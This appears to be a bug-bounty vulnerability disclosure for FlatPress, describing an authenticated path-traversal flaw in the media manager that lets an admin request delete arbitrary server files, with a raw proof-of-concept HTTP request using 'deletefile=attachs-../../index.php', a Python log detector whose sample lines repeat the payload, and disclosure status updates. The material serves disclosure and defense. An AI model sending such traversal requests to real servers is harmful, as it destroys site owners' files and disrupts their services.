File Deletion Detected in flatpressblog/flatpress
Valid
Reported on Dec 24th 2022
Description
The vulnerability allows deleting files on the server, which can affect the logic of the source code or disrupt the program's normal operation.
Proof of Concept
B1. Login and access to admin.php?p=uploader&action=mediamanager
B2. Delete 1 uploaded file
B3. Change the parameter to `deletefile=attachs-{file path}`
E.g.: Delete the file index.php
GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-../../index.php HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/flatpress-master/admin.php?p=uploader&action=mediamanager
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u
Connection: close
Impact
The vulnerability allows deleting files on the server, which can affect the logic of the source code or disrupt the program's normal operation.
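A log check for the request pattern in the proof of concept, added here as an example and not part of the original report or of FlatPress's code: it flags `deletefile` values that resolve outside the upload directory. The log lines are constructed, and treating the text after `attachs-` as a path relative to the upload directory is an assumption drawn from the request above.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

PREFIX = "attachs-"  # prefix seen in the report's deletefile value
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined-log style), not from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [24/Dec/2022:10:00:01 +0000] "GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-report.pdf HTTP/1.1" 200 5120',
    '127.0.0.1 - - [24/Dec/2022:10:00:09 +0000] "GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-../../index.php HTTP/1.1" 200 5120',
    '127.0.0.1 - - [24/Dec/2022:10:00:15 +0000] "GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-..%2F..%2Findex.php HTTP/1.1" 200 5120',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so the check sees the final path text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_upload_dir(name):
    """True if the name is absolute or normalizes to a path above the upload dir."""
    name = name.replace("\\", "/")
    if name.startswith("/") or "\x00" in name:
        return True
    normalized = posixpath.normpath(name)
    return normalized == ".." or normalized.startswith("../")

def suspicious_deletes(lines):
    """Return (line_number, decoded_value) for deletefile values leaving the upload dir."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        for raw in query.get("deletefile", []):
            value = fully_decode(raw)
            name = value[len(PREFIX):] if value.startswith(PREFIX) else value
            if escapes_upload_dir(name):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_deletes(SAMPLE_LOG):
        print(f"line {number}: deletefile={value}")
```

The same normalize-then-compare test in `escapes_upload_dir` is the check a server-side fix needs before deleting anything: resolve the requested name and refuse it unless the result stays inside the upload directory.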
We are processing your report and will contact the flatpressblog/flatpress team within 24 hours.
5 months ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back
5 months ago
good find, thanks for reporting!
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Mar 1st 2023
